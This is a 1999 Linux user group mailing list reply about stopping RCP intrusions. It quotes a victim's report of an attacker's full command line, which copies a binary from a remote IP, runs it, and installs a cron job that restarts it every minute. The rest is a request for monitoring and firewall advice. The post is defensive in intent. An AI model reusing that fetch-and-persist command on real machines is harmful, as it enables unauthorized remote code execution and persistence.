[OLUG] RCP

Jason Ferguson jferguson3 at home.com
Tue Dec 14 18:23:06 UTC 1999

Todd wrote:

>         Can anyone tell me how to stop RCP access to my Linux box, and if there are
> any security tools available to monitor a RCP connection.  On December 11
> someone gained access and perfomed the following to my machine:
> rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
>         I currently am running logwatch and uwatch, but this connection did not
> show up in either.      Any suggestions would be welcomed.

Anyone got a location to grab logwatch?  Doesnt seem to have come with RH 6.1... with
a cable modem its only a matter of time before someone tries this stuff with me, and I
still doing have a decent firewall on this thing (I still dont know how the rules
should be written, what to block, etc).

Jason